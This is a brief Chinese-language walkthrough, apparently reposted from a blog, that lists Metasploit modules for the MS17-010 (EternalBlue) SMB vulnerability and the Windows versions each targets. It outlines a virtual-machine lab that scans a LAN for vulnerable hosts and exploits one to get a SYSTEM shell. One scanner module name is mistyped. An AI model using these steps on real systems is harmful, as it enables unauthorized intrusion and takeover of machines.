Ms17-010攻击模块
exploit/windows/smb/ms17_010_eternalblue (window2008、 windows7、windows8.1、 Windows Server2012 Datacenter 9200)
exploit/windows/smb/ms17_010_psexec (windows2003、window xp 、windows2012)
exploit/windows/smb/eternalblue_doublepulsar
admin/smb/ms17_010_command
generic/shell_reverse_tcp
扫描当前内网是否有存在ms17010的漏洞主机
use scanner/smb/smb_ms71_010
本地复现过程
复现环境:在虚拟机同一内网,系统为kali和windows2008
扫描内网中是否有存在ms17010漏洞的主机
设置IP范围和线程
扫描存在一个主机有ms17010漏洞,并且显示主机系统为Windows Server 2008 R2 Standard
然后使用exploit/windows/smb/ms17_010_eternalblue模块
然后设置IP,然后开始攻击,成功返回shell
直接获取到system权限
原文:https://www.cnblogs.com/shisana/p/12501186.html